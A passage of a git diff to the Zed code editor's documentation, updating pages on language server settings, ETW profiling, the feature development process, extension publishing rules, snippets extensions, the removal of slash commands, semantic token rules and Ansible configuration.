Ruby. The default configuration is: + +```json [settings] +{ + "language_servers": [ + "solargraph", + "!ruby-lsp", + "!rubocop", + "!sorbet", + "!steep", + "!kanayago", + "..." + ] +} +``` + +When you override `language_servers` in your settings, your list **replaces** the default entirely. 
This means default-disabled servers like `kanayago` will be re-enabled by `"..."` unless you explicitly disable them again. + +| Configuration | Result | +| ------------------------------------------------- | ------------------------------------------------------------------ | +| `["..."]` | `solargraph`, `ruby-lsp`, `rubocop`, `sorbet`, `steep`, `kanayago` | +| `["ruby-lsp", "..."]` | `ruby-lsp`, `solargraph`, `rubocop`, `sorbet`, `steep`, `kanayago` | +| `["ruby-lsp", "!solargraph", "!kanayago", "..."]` | `ruby-lsp`, `rubocop`, `sorbet`, `steep` | +| `["ruby-lsp", "solargraph"]` | `ruby-lsp`, `solargraph` | + +> Note: In the first example, `"..."` includes `kanayago` even though it is disabled by default. The override replaced the default list, so the `"!kanayago"` entry is no longer present. To keep it disabled, you must include `"!kanayago"` in your configuration. ### Toolchains @@ -136,8 +165,6 @@ Not all languages in Zed support toolchain discovery and selection, but for thos ### Configuring Language Servers -> **Changed in Preview (v0.225).** See [release notes](/releases#0.225). - When configuring language servers in your `settings.json`, autocomplete suggestions include all available LSP adapters recognized by Zed, not only those currently active for loaded languages. This helps you discover and configure language servers before opening files that use them. Many language servers accept custom configuration options. You can set these in the `lsp` section of your `settings.json`: @@ -324,6 +351,18 @@ To run linter fixes automatically on save: } ``` +### Formatting Selections + +Zed supports formatting only the selected text via `editor: format selections` ({#kb editor::FormatSelections}). How +this works depends on the configured formatter: + +- **Language server**: Sends an LSP range formatting request for each selection. This provides the most precise + selection-only formatting. 
+- **Prettier**: Uses Prettier's built-in range formatting to format the encompassing range of all selections. Any + resulting edits that fall outside the selected ranges are discarded, so only the selected code is modified. +- **External commands**: External command formatters do not support range formatting and are skipped when formatting + selections. + ### Integrating Formatting and Linting Zed allows you to run both formatting and linting on save. Here's an example that uses Prettier for formatting and ESLint for linting JavaScript files: diff --git a/docs/src/configuring-zed.md b/docs/src/configuring-zed.md index ec775964dfd35ad019a37ad58ffe42bc03c645c1..b2a8c1e88a4abbead7afe4978abd110880f1fae2 100644 --- a/docs/src/configuring-zed.md +++ b/docs/src/configuring-zed.md @@ -69,6 +69,10 @@ Settings are applied in layers: Later layers override earlier ones. For object settings (like `terminal`), properties merge rather than replace entirely. +## Per-file Settings + +Zed has some compatibility support for Emacs and Vim [modelines](./modelines.md), so you can set some settings per-file. + ## Per-Release Channel Overrides Use different settings for Stable, Preview, or Nightly builds by adding top-level channel keys: diff --git a/docs/src/debugger.md b/docs/src/debugger.md index c659c1410b38166cf11da0af728e18f8c9282054..bf05de0f6ccccff4e95fd622bab7130d655a1167 100644 --- a/docs/src/debugger.md +++ b/docs/src/debugger.md @@ -165,8 +165,6 @@ The debug adapter will then stop whenever an exception of a given kind occurs. W ## Working with Split Panes -> **Changed in Preview (v0.225).** See [release notes](/releases#0.225). - When debugging with multiple split panes open, Zed shows the active debug line in one pane and preserves your layout in others. If you have the same file open in multiple panes, the debugger picks a pane where the file is already the active tab—it won't switch tabs in panes where the file is inactive. 
Once the debugger picks a pane, it continues using that pane for subsequent breakpoints during the session. If you drag the tab with the active debug line to a different split, the debugger tracks the move and uses the new pane. diff --git a/docs/src/development.md b/docs/src/development.md index d8ea0b3f980317ff1f38a8325534e57f321bd8de..b4c9ea387da020be8d2d0dd517b0c5998bde41e2 100644 --- a/docs/src/development.md +++ b/docs/src/development.md @@ -88,33 +88,27 @@ in-depth examples and explanations. ## ETW Profiling on Windows -> **Changed in Preview (v0.225).** See [release notes](/releases#0.225). +Zed supports performance profiling with Event Tracing for Windows (ETW) to capture detailed performance data, including CPU, GPU, memory, disk, and file I/O activity. Data is saved to an `.etl` file, which can be opened in standard profiling tools for analysis. -Zed supports Event Tracing for Windows (ETW) to capture detailed performance data. You can record CPU, GPU, disk I/O, and file I/O activity, with optional heap allocation tracking. +ETW recordings may contain personally identifiable or security-sensitive information, such as paths to files and registry keys accessed, as well as process names. Please keep this in mind when sharing traces with others. ### Recording a trace -Open the command palette and run: +Open the command palette and run one of the following: -- **`etw_tracing: Record Etw Trace`** — Records CPU, GPU, and I/O activity -- **`etw_tracing: Record Etw Trace With Heap Tracing`** — Includes heap allocation data for the Zed process +- `zed: record etw trace`: records CPU, GPU, memory, and I/O activity +- `zed: record etw trace with heap tracing`: includes heap allocation data for the Zed process -Zed prompts you to choose a save location for the `.etl` trace file. +Zed will prompt you to choose a save location for the `.etl` file, then request administrator permission. Once granted, recording will begin. 
### Saving or canceling -While recording: +While a trace is recording, open the command palette and run one of the following: -- **`etw_tracing: Save Etw Trace`** — Stops recording and saves the trace to disk -- **`etw_tracing: Cancel Etw Trace`** — Stops recording without saving +- `zed: save etw trace`: stops recording and saves the trace to disk +- `zed: cancel etw trace`: stops recording without saving -Zed buffers trace data in memory. Recordings automatically save after 60 seconds if you don't manually stop them. - -### Analyzing traces - -Open `.etl` files with [Windows Performance Analyzer](https://learn.microsoft.com/en-us/windows-hardware/test/wpt/windows-performance-analyzer) to inspect CPU stacks, GPU usage, disk I/O patterns, and heap allocations. - -**Note for existing keybindings**: The `etw_tracing::StopEtwTrace` action was renamed to `etw_tracing::SaveEtwTrace`. Update any custom keybindings. +Recordings automatically save after 60 seconds if not stopped manually. ## Contributor links diff --git a/docs/src/development/feature-process.md b/docs/src/development/feature-process.md new file mode 100644 index 0000000000000000000000000000000000000000..ec39c6c4b59ef5916d5f5dcfada9abf326f77a3a --- /dev/null +++ b/docs/src/development/feature-process.md @@ -0,0 +1,55 @@ +# Zed's Feature Development Process + +This is for moderate-to-large features — new UI, behavior changes, or work that cuts across multiple parts of Zed. Small keybindings or settings tweaks don't need all of this. + +> **Before you start:** If you're an external contributor, make sure the feature is something the team wants before investing significant effort. Please read the [Contributing Guide](../../../CONTRIBUTING.md) and our [Feature Request Guidelines](https://github.com/zed-industries/zed/discussions/51422) — if there isn't already a GitHub issue with clear staff confirmation, start with a GitHub Discussion. Feature request PRs that skip this process have a _very_ low merge rate. 
Taking the time to follow our process significantly increases the chances your idea gets picked up and built. + +## 1. Why does this matter? + +Every feature starts as an idea. Before writing any code, ground it: + +- **What problem does this solve?** +- **What's the evidence?** GitHub issues, Discord requests, thumbs-up counts, blog posts. +- **Is there prior art?** If it's in VS Code, JetBrains, Neovim, or a wildly popular plugin, that's a strong signal. If the idea is more novel, name what it's based on — "This is X, adapted for Zed's multi-buffers" is far more useful than "I think this would be cool." + +## 2. What is it? + +Write a short, concrete feature statement, then back it up with the context gathered above. If you can't describe the feature in a few sentences, it might be too big or too vague. + +Here's an example format, though adapt it to whatever your feature needs: + +**Feature:** Inline Git Blame + +**Purpose:** Show the last commit author and message for each line directly after the editor text, so developers can understand code history without opening the git blame. + +**Background:** +This is standard across all major code editors: + +- \[screenshot of VSCode] +- \[screenshot of Intellij] +- \[screenshot of Neovim] +- and has 146 thumbs up on this [github issue](https://github.com). + +**Decisions:** +We have to decide whether to use the git CLI or a git library. Zed uses a git library but its blame implementation is too slow for a code editor, so we should use the CLI's porcelain interface. + +## 3. What else does this affect? + +Walk through this list before you start building. Not everything will apply: + +- **Actions & keybindings.** What actions does your feature define? Do the default keybindings conflict with existing ones? +- **Settings.** Is any behavior configurable? Per-user vs. per-project vs. per-language? Don't forget to add new settings to the Settings UI. +- **Themes & styling.** Does this need a new semantic token? 
Does it look right in both light and dark mode? +- **Vim mode.** Vim users might have different expectations for this feature. +- **Remote development.** Does your feature work with remote projects? File paths, shell commands, and environment variables all might behave differently. +- **Persistence across restarts.** Should your feature's state persist across restarts? +- **Accessibility.** Is it keyboard-navigable? Are focus states clear? +- **Platform differences.** Does behavior differ on macOS, Linux, or Windows? +- **Performance.** How does it behave with large files or big projects? Are interactions instant? +- **Security.** How does this feature interact with Workspace Trust? Does it open new attack surfaces in Zed? + +If your feature touches the **editor** specifically: the editor has a lot of coexisting features — gutter elements, inline blocks, multiple cursors, folding, edit predictions, code intelligence popovers, the minimap. Test your changes with different combinations of them active. Features that work in a normal buffer might need to be disabled in a multi-buffer. + +## 4. Ship it + +Use this as the basis for your GitHub Discussion, issue, or PR description. Good product research gets everyone aligned on goals, the state of the art, and any tradeoffs we might need to consider. diff --git a/docs/src/development/glossary.md b/docs/src/development/glossary.md index 720c20c3bd42074b3e2b4863b879a54001d27e73..1f6b07840b8c70a86c587c45e7b617b0266144e1 100644 --- a/docs/src/development/glossary.md +++ b/docs/src/development/glossary.md @@ -1,5 +1,5 @@ --- -title: Zed Development: Glossary +title: "Zed Development: Glossary" description: "Guide to zed development: glossary for Zed development." --- @@ -84,16 +84,16 @@ h_flex() - `Panel`: An `Entity` implementing the `Panel` trait. Panels can be placed in a `Dock`. In the image below: `ProjectPanel` is in the left dock, `DebugPanel` is in the bottom dock, and `AgentPanel` is in the right dock. 
`Editor` does not implement `Panel`. - `Dock`: A UI element similar to a `Pane` that can be opened and hidden. Up to three docks can be open at once: left, right, and bottom. A dock contains one or more `Panel`s, not `Pane`s. -Screenshot for the Pane and Dock features +Screenshot for the Pane and Dock features - `Project`: One or more `Worktree`s - `Worktree`: Represents either local or remote files. -Screenshot for the Worktree feature +Screenshot for the Worktree feature - [Multibuffer](https://zed.dev/docs/multibuffers): A list of Editors, a multi-buffer allows editing multiple files simultaneously. A multi-buffer opens when an operation in Zed returns multiple locations, examples: _search_ or _go to definition_. See project search in the image below. -Screenshot for the MultiBuffer feature +Screenshot for the MultiBuffer feature ## Editor diff --git a/docs/src/development/macos.md b/docs/src/development/macos.md index 62c2218e52751c1117da90e76ae13554b7e8f792..6315ddcab8a554cf0405f8095c5aff98b09d6251 100644 --- a/docs/src/development/macos.md +++ b/docs/src/development/macos.md @@ -89,7 +89,7 @@ Before making any UI changes, generate baseline images from a known-good state: ```sh git checkout origin/main -UPDATE_BASELINE=1 cargo run -p zed --bin visual_test_runner --features visual-tests +UPDATE_BASELINE=1 cargo run -p zed --bin zed_visual_test_runner --features visual-tests git checkout - ``` @@ -118,7 +118,8 @@ xcrun: error: unable to find utility "metal", not a developer tool or in PATH Try `sudo xcode-select --switch /Applications/Xcode.app/Contents/Developer` -If you're on macOS 26, try `xcodebuild -downloadComponent MetalToolchain` +If you're on macOS 26, try `xcodebuild -downloadComponent MetalToolchain`. +If that command fails, run `xcodebuild -runFirstLaunch` and try downloading the toolchain again. 
### Cargo errors claiming that a dependency is using unstable features diff --git a/docs/src/extensions.md b/docs/src/extensions.md index 01636894a11781717a837a0f0784d6221ded1c3c..9e46f4ab54e5a22f16a1ef156533d25511c36606 100644 --- a/docs/src/extensions.md +++ b/docs/src/extensions.md @@ -14,6 +14,6 @@ Zed lets you add new functionality using user-defined extensions. - [Developing Debugger Extensions](./extensions/debugger-extensions.md) - [Developing Themes](./extensions/themes.md) - [Developing Icon Themes](./extensions/icon-themes.md) - - [Developing Slash Commands](./extensions/slash-commands.md) + - [Developing Snippets](./extensions/snippets.md) - [Developing Agent Servers](./extensions/agent-servers.md) - [Developing MCP Servers](./extensions/mcp-extensions.md) diff --git a/docs/src/extensions/developing-extensions.md b/docs/src/extensions/developing-extensions.md index 84e57df49fca95adb6c5c4fb5d9aad3b8c771383..01c16dc62be8b9be7e576bc1be10f20437acc993 100644 --- a/docs/src/extensions/developing-extensions.md +++ b/docs/src/extensions/developing-extensions.md @@ -1,11 +1,11 @@ --- title: Developing Extensions -description: "Create Zed extensions: languages, themes, debuggers, slash commands, and more." +description: "Create Zed extensions: languages, themes, debuggers, and more." --- # Developing Extensions {#developing-extensions} -Zed extensions are Git repositories containing an `extension.toml` manifest. They can provide languages, themes, debuggers, slash commands, and MCP servers. +Zed extensions are Git repositories containing an `extension.toml` manifest. They can provide languages, themes, debuggers, snippets, and MCP servers. 
## Extension Features {#extension-features} @@ -15,7 +15,7 @@ Extensions can provide: - [Debuggers](./debugger-extensions.md) - [Themes](./themes.md) - [Icon Themes](./icon-themes.md) -- [Slash Commands](./slash-commands.md) +- [Snippets](./snippets.md) - [MCP Servers](./mcp-extensions.md) ## Developing an Extension Locally @@ -47,8 +47,6 @@ description = "Example extension" repository = "https://github.com/your-name/my-zed-extension" ``` -> **Note:** If you are working on a theme extension with the intent to publish it later, suffix your theme extension ID with `-theme`. Otherwise, this may be raised during [extension publishing](#publishing-your-extension). - In addition to this, there are several other optional files and directories that can be used to add functionality to a Zed extension. An example directory structure of an extension that provides all capabilities is as follows: ``` @@ -63,6 +61,9 @@ my-extension/ highlights.scm themes/ my-theme.json + snippets/ + snippets.json + rust.json ``` ## WebAssembly @@ -126,9 +127,11 @@ The following licenses are accepted: - [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0) - [BSD 2-Clause](https://opensource.org/license/bsd-2-clause) - [BSD 3-Clause](https://opensource.org/license/bsd-3-clause) +- [CC BY 4.0](https://creativecommons.org/licenses/by/4.0) - [GNU GPLv3](https://www.gnu.org/licenses/gpl-3.0.en.html) - [GNU LGPLv3](https://www.gnu.org/licenses/lgpl-3.0.en.html) - [MIT](https://opensource.org/license/mit) +- [Unlicense](https://unlicense.org) - [zlib](https://opensource.org/license/zlib) This allows us to distribute the resulting binary produced from your extension code to our users. @@ -138,7 +141,24 @@ Your license file should be at the root of your extension repository. Any filena > This license requirement applies only to your extension code itself (the code that gets compiled into the extension binary). 
> It does not apply to any tools your extension may download or interact with, such as language servers or other external dependencies. -> If your repository contains both extension code and other projects (like a language server), you are not required to relicense those other projects—only the extension code needs to be one of the aforementioned accepted licenses. +> If your repository contains both extension code and other projects (like a language server), you are not required to relicense those other projects — only the extension code needs to be one of the aforementioned accepted licenses. + +## Extension Publishing Prerequisites + +Before publishing your extension, make sure that you have chosen a unique extension ID for your extension in the [extension manifest](#directory-structure-of-a-zed-extension). +This will be the primary identifier for your extension and cannot be changed after your extension has been published. +Also, ensure that you have filled out all the required fields in the manifest. + +Furthermore, please make sure that your extension fulfills the following preconditions before you move on to publishing your extension: + +- Extension IDs and names must not contain the words `zed`, `Zed` or `extension`, since they are all Zed extensions. +- Your extension ID should provide some information on what your extension tries to accomplish. E.g. for themes, it should be suffixed with `-theme`, snippet extensions should be suffixed with `-snippets` and so on. An exception to that rule are extensions that provide support for languages or popular tooling that people would expect to find under that ID. You can take a look at the list of [existing extensions](https://github.com/zed-industries/extensions/blob/main/extensions.toml) to get a grasp on how this is usually enforced. +- Extensions should provide something that is not yet available in the marketplace as opposed to fixing something that could be resolved within an existing extension.
For example, if you find that an existing extension's support for a language server is not functioning properly, first try contributing a fix to the existing extension as opposed to submitting a new extension immediately. +  - If you receive no response or reaction within the upstream repository within a reasonable amount of time, feel free to submit a pull request that aims to fix said issue. Please ensure that you describe your previous efforts in the pull request to the extensions repository for adding your extension. Zed maintainers will then decide on how to proceed on a case-by-case basis. +- Extensions that intend to provide a language, debugger or MCP server must not ship the language server as part of the extension. Instead, the extension should either download the language server or check for the availability of the language server in the user's environment using the APIs as provided by the [Zed Rust Extension API](https://docs.rs/zed_extension_api/latest/zed_extension_api/). +- Themes and icon themes should not be published as part of extensions that provide other features, e.g. language support. Instead, they should be published as a distinct extension. This also applies to themes and icon themes living in the same repository. + +Note that non-compliance will be raised during the publishing process by reviewers and delay the release of your extension. ## Publishing your extension @@ -146,11 +166,11 @@ To publish an extension, open a PR to [the `zed-industries/extensions` repo](htt In your PR, do the following: -1. Add your extension as a Git submodule within the `extensions/` directory +1.
Add your extension as a Git submodule within the `extensions/` directory under the `extensions/{extension-id}` path ```sh -git submodule add https://github.com/your-username/foobar-zed.git extensions/foobar -git add extensions/foobar +git submodule add https://github.com/your-username/foobar-zed.git extensions/my-extension +git add extensions/my-extension ``` > All extension submodules must use HTTPS URLs and not SSH URLS (`git@github.com`). @@ -163,14 +183,21 @@ submodule = "extensions/my-extension" version = "0.0.1" ``` -> If your extension is in a subdirectory within the submodule you can use the `path` field to point to where the extension resides. +If your extension is in a subdirectory within the submodule, you can use the `path` field to point to where the extension resides: + +```toml +[my-extension] +submodule = "extensions/my-extension" +path = "packages/zed" +version = "0.0.1" +``` + +> Note that the [required extension license](#extension-license-requirements) must reside at the specified path; a license at the root of the repository will not work. However, you are free to symlink an existing license within the repository or choose an alternative license from the list of accepted licenses for the extension code. 3. Run `pnpm sort-extensions` to ensure `extensions.toml` and `.gitmodules` are sorted Once your PR is merged, the extension will be packaged and published to the Zed extension registry. -> Extension IDs and names should not contain `zed` or `Zed`, since they are all Zed extensions. - ## Updating an extension To update an extension, open a PR to [the `zed-industries/extensions` repo](https://github.com/zed-industries/extensions).
diff --git a/docs/src/extensions/languages.md b/docs/src/extensions/languages.md index 3e748e4b33e51e2dcd08175b793d97ea0ddda2d8..121357306e73552140f938197ffc466c0e489484 100644 --- a/docs/src/extensions/languages.md +++ b/docs/src/extensions/languages.md @@ -52,7 +52,7 @@ TBD: Document `language_name/config.toml` keys ## Grammar -Zed uses the [Tree-sitter](https://tree-sitter.github.io) parsing library to provide built-in language-specific features. There are grammars available for many languages, and you can also [develop your own grammar](https://tree-sitter.github.io/tree-sitter/creating-parsers#writing-the-grammar). A growing list of Zed features are built using pattern matching over syntax trees with Tree-sitter queries. As mentioned above, every language that is defined in an extension must specify the name of a Tree-sitter grammar that is used for parsing. These grammars are then registered separately in extensions' `extension.toml` file, like this: +Zed uses the [Tree-sitter](https://tree-sitter.github.io) parsing library to provide built-in language-specific features. There are grammars available for many languages, and you can also [develop your own grammar](https://tree-sitter.github.io/tree-sitter/creating-parsers/3-writing-the-grammar.html). A growing list of Zed features are built using pattern matching over syntax trees with Tree-sitter queries. As mentioned above, every language that is defined in an extension must specify the name of a Tree-sitter grammar that is used for parsing. These grammars are then registered separately in extensions' `extension.toml` file, like this: ```toml [grammars.gleam] @@ -143,6 +143,21 @@ This query marks strings, object keys, and numbers for highlighting. The followi | @variable.parameter | Captures function/method parameters | | @variant | Captures variants | +#### Fallback captures + +A single Tree-sitter pattern can specify multiple captures on the same node to define fallback highlights. 
+Zed resolves them right-to-left: It first tries the rightmost capture, and if the current theme has no style for it, falls back to the next capture to the left, and so on. + +For example: + +```scheme +(type_identifier) @type @variable +``` + +Here Zed will first try to resolve `@variable` from the theme. If the theme defines a style for `@variable`, that style is used. Otherwise, Zed falls back to `@type`. + +This is useful when a language wants to provide a preferred highlight that not all themes may support, while still falling back to a more common capture that most themes define. + ### Bracket matching The `brackets.scm` file defines matching brackets. @@ -434,6 +449,40 @@ The `semantic_tokens` setting accepts the following values: - `"combined"`: Use LSP semantic tokens together with tree-sitter highlighting. - `"full"`: Use LSP semantic tokens exclusively, replacing tree-sitter highlighting. +#### Extension-Provided Semantic Token Rules + +Language extensions can ship default semantic token rules for their language server's custom token types. To do this, place a `semantic_token_rules.json` file in the language directory alongside `config.toml`: + +``` +my-extension/ + languages/ + my-language/ + config.toml + highlights.scm + semantic_token_rules.json +``` + +The file uses the same format as the `semantic_token_rules` array in user settings — a JSON array of rule objects: + +```json +[ + { + "token_type": "lifetime", + "style": ["lifetime"] + }, + { + "token_type": "builtinType", + "style": ["type"] + }, + { + "token_type": "selfKeyword", + "style": ["variable.special"] + } +] +``` + +This is useful when a language server reports custom (non-standard) semantic token types that aren't covered by Zed's built-in default rules. 
Extension-provided rules act as sensible defaults for that language — users can always override them via `semantic_token_rules` in their settings file, and built-in default rules are only used when neither user nor extension rules match. + #### Customizing Semantic Token Styles Zed supports customizing the styles used for semantic tokens. You can define rules in your settings file, which customize how semantic tokens get mapped to styles in your theme. @@ -463,7 +512,13 @@ Zed supports customizing the styles used for semantic tokens. You can define rul } ``` -All rules that match a given `token_type` and `token_modifiers` are applied. Earlier rules take precedence. If no rules match, the token is not highlighted. User-defined rules take priority over the default rules. +All rules that match a given `token_type` and `token_modifiers` are applied. Earlier rules take precedence. If no rules match, the token is not highlighted. + +Rules are applied in the following priority order (highest to lowest): + +1. **User settings** — rules from `semantic_token_rules` in your settings file. +2. **Extension rules** — rules from `semantic_token_rules.json` in extension language directories. +3. **Default rules** — Zed's built-in rules for standard LSP token types. Each rule in the `semantic_token_rules` array is defined as follows: diff --git a/docs/src/extensions/slash-commands.md b/docs/src/extensions/slash-commands.md index 432af3bd61704eeeeed103b2d86badef662d7a44..a76852189301e7dbfe1a31af6a7743fe4215c4c6 100644 --- a/docs/src/extensions/slash-commands.md +++ b/docs/src/extensions/slash-commands.md @@ -1,143 +1,11 @@ --- -title: Slash Commands -description: "Slash Commands for Zed extensions." +title: Slash Commands (Removed) +description: Extension slash commands have been removed from Zed. +redirect_to: ./mcp-extensions.md --- # Slash Commands -Extensions may provide slash commands for use in the Assistant. +Extension-provided slash commands have been removed from Zed. 
-## Example extension - -To see a working example of an extension that provides slash commands, check out the [`slash-commands-example` extension](https://github.com/zed-industries/zed/tree/main/extensions/slash-commands-example). - -This extension can be [installed as a dev extension](./developing-extensions.md#developing-an-extension-locally) if you want to try it out for yourself. - -## Defining slash commands - -A given extension may provide one or more slash commands. Each slash command must be registered in the `extension.toml`. - -For example, here is an extension that provides two slash commands: `/echo` and `/pick-one`: - -```toml -[slash_commands.echo] -description = "echoes the provided input" -requires_argument = true - -[slash_commands.pick-one] -description = "pick one of three options" -requires_argument = true -``` - -Each slash command may define the following properties: - -- `description`: A description of the slash command that will be shown when completing available commands. -- `requires_argument`: Indicates whether a slash command requires at least one argument to run. - -## Implementing slash command behavior - -To implement behavior for your slash commands, implement `run_slash_command` for your extension. - -This method accepts the slash command that will be run, the list of arguments passed to it, and an optional `Worktree`. - -This method returns `SlashCommandOutput`, which contains the textual output of the command in the `text` field. The output may also define `SlashCommandOutputSection`s that contain ranges into the output. These sections are then rendered as creases in the Assistant's context editor. 
- -Your extension should `match` on the command name (without the leading `/`) and then execute behavior accordingly: - -```rs -impl zed::Extension for MyExtension { - fn run_slash_command( - &self, - command: SlashCommand, - args: Vec, - _worktree: Option<&Worktree>, - ) -> Result { - match command.name.as_str() { - "echo" => { - if args.is_empty() { - return Err("nothing to echo".to_string()); - } - - let text = args.join(" "); - - Ok(SlashCommandOutput { - sections: vec![SlashCommandOutputSection { - range: (0..text.len()).into(), - label: "Echo".to_string(), - }], - text, - }) - } - "pick-one" => { - let Some(selection) = args.first() else { - return Err("no option selected".to_string()); - }; - - match selection.as_str() { - "option-1" | "option-2" | "option-3" => {} - invalid_option => { - return Err(format!("{invalid_option} is not a valid option")); - } - } - - let text = format!("You chose {selection}."); - - Ok(SlashCommandOutput { - sections: vec![SlashCommandOutputSection { - range: (0..text.len()).into(), - label: format!("Pick One: {selection}"), - }], - text, - }) - } - command => Err(format!("unknown slash command: \"{command}\"")), - } - } -} -``` - -## Auto-completing slash command arguments - -For slash commands that have arguments, you may also choose to implement `complete_slash_command_argument` to provide completions for your slash commands. - -This method accepts the slash command that will be run and the list of arguments passed to it. It returns a list of `SlashCommandArgumentCompletion`s that will be shown in the completion menu. - -A `SlashCommandArgumentCompletion` consists of the following properties: - -- `label`: The label that will be shown in the completion menu. -- `new_text`: The text that will be inserted when the completion is accepted. -- `run_command`: Whether the slash command will be run when the completion is accepted. 
- -Once again, your extension should `match` on the command name (without the leading `/`) and return the desired argument completions: - -```rs -impl zed::Extension for MyExtension { - fn complete_slash_command_argument( - &self, - command: SlashCommand, - _args: Vec, - ) -> Result, String> { - match command.name.as_str() { - "echo" => Ok(vec![]), - "pick-one" => Ok(vec![ - SlashCommandArgumentCompletion { - label: "Option One".to_string(), - new_text: "option-1".to_string(), - run_command: true, - }, - SlashCommandArgumentCompletion { - label: "Option Two".to_string(), - new_text: "option-2".to_string(), - run_command: true, - }, - SlashCommandArgumentCompletion { - label: "Option Three".to_string(), - new_text: "option-3".to_string(), - run_command: true, - }, - ]), - command => Err(format!("unknown slash command: \"{command}\"")), - } - } -} -``` +To extend the Agent Panel with custom tools and context, use [MCP Servers](./mcp-extensions.md) instead. diff --git a/docs/src/extensions/snippets.md b/docs/src/extensions/snippets.md new file mode 100644 index 0000000000000000000000000000000000000000..1fa83b07b78403346608494b3932b58e37f8688e --- /dev/null +++ b/docs/src/extensions/snippets.md @@ -0,0 +1,27 @@ +--- +title: Snippets +description: "Snippets for Zed extensions." +--- + +# Snippets + +Extensions may provide snippets for one or more languages. + +Each file containing snippets can be specified in the `snippets` field of the `extension.toml` file. + +The referenced path must be relative to the `extension.toml`. + +## Defining Snippets + +A given extension may provide one or more snippets. Each snippet must be registered in the `extension.toml`. + +Zed matches snippet files based on the lowercase name of the language (e.g. `rust.json` for Rust). +You can use `snippets.json` as a file name to define snippets that will be available regardless of the current buffer language.
+ +For example, here is an extension that provides snippets for Rust and TypeScript: + +```toml +snippets = ["./snippets/rust.json", "./snippets/typescript.json"] +``` + +For more information on how to create snippets, see the [Snippets documentation](../snippets.md). diff --git a/docs/src/finding-navigating.md b/docs/src/finding-navigating.md index f1d3536f8c909f18240f83eac6f4309159b764e1..af30b0ee71554012c2292092f4d7694784ff14cd 100644 --- a/docs/src/finding-navigating.md +++ b/docs/src/finding-navigating.md @@ -23,14 +23,6 @@ Search across all files with {#kb pane::DeploySearch}. Start typing in the searc Results appear in a [multibuffer](./multibuffers.md), letting you edit matches in place. -To disable automatic search and require pressing Enter instead, open the Settings Editor ({#kb zed::OpenSettings}), search for "search on input", and toggle the setting off. Or add this to your settings.json: - -```json -{ - "search_on_input": false -} -``` - ## Go to Definition Jump to where a symbol is defined with {#kb editor::GoToDefinition} (or `Cmd+Click` / `Ctrl+Click`). If there are multiple definitions, they open in a multibuffer. diff --git a/docs/src/getting-started.md b/docs/src/getting-started.md index af6a41c26a6f70f073b2d7e45267871962bb1697..a87e1bea0f4c3eacaa330b34874283a0b61b5eb9 100644 --- a/docs/src/getting-started.md +++ b/docs/src/getting-started.md @@ -13,8 +13,6 @@ This guide covers the essential commands, environment setup, and navigation basi ### Welcome Page -> **Changed in Preview (v0.225).** See [release notes](/releases#0.225). - When you open Zed without a folder, you see the welcome page in the main editor area. The welcome page offers quick actions to open a folder, clone a repository, or view documentation. Once you open a folder or file, the welcome page disappears. If you split the editor into multiple panes, the welcome page appears only in the center pane when empty—other panes show a standard empty state. 
To reopen the welcome page, close all items in the center pane or use the command palette to search for "Welcome". diff --git a/docs/src/git.md b/docs/src/git.md index b33aa0690cbad99f792729dd780ab03716d0dc4c..f7b524925195a80af05387ad1b063ceccff66436 100644 --- a/docs/src/git.md +++ b/docs/src/git.md @@ -99,11 +99,11 @@ You can switch between modes at any time. Your preference applies to [Project Di File History shows the commit history for an individual file. Each entry displays the commit's author, timestamp, and message. Selecting a commit opens a diff view filtered to show only the changes made to that file in that commit. -To open File History: +To view File History: -- Right-click on a file in the Project Panel and select "Open File History" -- Right-click on a file in the Git Panel and select "Open File History" -- Right-click on an editor tab and select "Open File History" +- Right-click on a file in the Project Panel and select "View File History" +- Right-click on a file in the Git Panel and select "View File History" +- Right-click on an editor tab and select "View File History" - Use the Command Palette and search for "file history" ## Fetch, Push, and Pull diff --git a/docs/src/languages/ansible.md b/docs/src/languages/ansible.md index 99980a1a1642717d8306cf8d98ce81be33326207..fd595bc7e3391ab95d90c3d4e34742e6a8bd7c1f 100644 --- a/docs/src/languages/ansible.md +++ b/docs/src/languages/ansible.md @@ -14,10 +14,13 @@ Support for Ansible in Zed is provided via a community-maintained [Ansible exten ### File detection -To avoid mishandling non-Ansible YAML files, the Ansible Language is not associated with any file extensions by default. To change this behavior you can add a `"file_types"` section to Zed settings inside your project (`.zed/settings.json`) or your Zed user settings (`~/.config/zed/settings.json`) to match your folder/naming conventions. 
For example: +To avoid mishandling non-Ansible YAML files, the Ansible Language is not associated with any file extensions by default. + +To change this behavior, you can add a `"file_types"` section to Zed settings inside your project (`.zed/settings.json`) or your Zed user settings (`~/.config/zed/settings.json`) to match your folder/naming conventions. For example: ```json [settings] -"file_types": { +{ + "file_types": { "Ansible": [ "**.ansible.yml", "**.ansible.yaml", @@ -39,6 +42,7 @@ To avoid mishandling non-Ansible YAML files, the Ansible Language is not associa "**playbook*.yaml" ] } +} ``` Feel free to modify this list as per your needs. @@ -47,34 +51,36 @@ Feel free to modify this list as per your needs. If your inventory file is in the YAML format, you can either: -- Append the `ansible-lint` inventory json schema to it via the following comment at the top of your inventory file: +- Append the `ansible-lint` inventory JSON schema to it via the following comment at the top of your inventory file: ```yml # yaml-language-server: $schema=https://raw.githubusercontent.com/ansible/ansible-lint/main/src/ansiblelint/schemas/inventory.json ``` -- Or configure the yaml language server settings to set this schema for all your inventory files, that match your inventory pattern, under your Zed settings ([ref](https://zed.dev/docs/languages/yaml)): +- or, configure the YAML language server settings to set this schema for all your inventory files, that match your inventory pattern, under your Zed settings ([ref](https://zed.dev/docs/languages/yaml)): ```json [settings] -"lsp": { +{ + "lsp": { "yaml-language-server": { "settings": { "yaml": { "schemas": { "https://raw.githubusercontent.com/ansible/ansible-lint/main/src/ansiblelint/schemas/inventory.json": [ "./inventory/*.yaml", - "hosts.yml", + "hosts.yml" ] } } } } -}, + } +} ``` ### LSP Configuration -By default, the following default config is passed to the Ansible language server. 
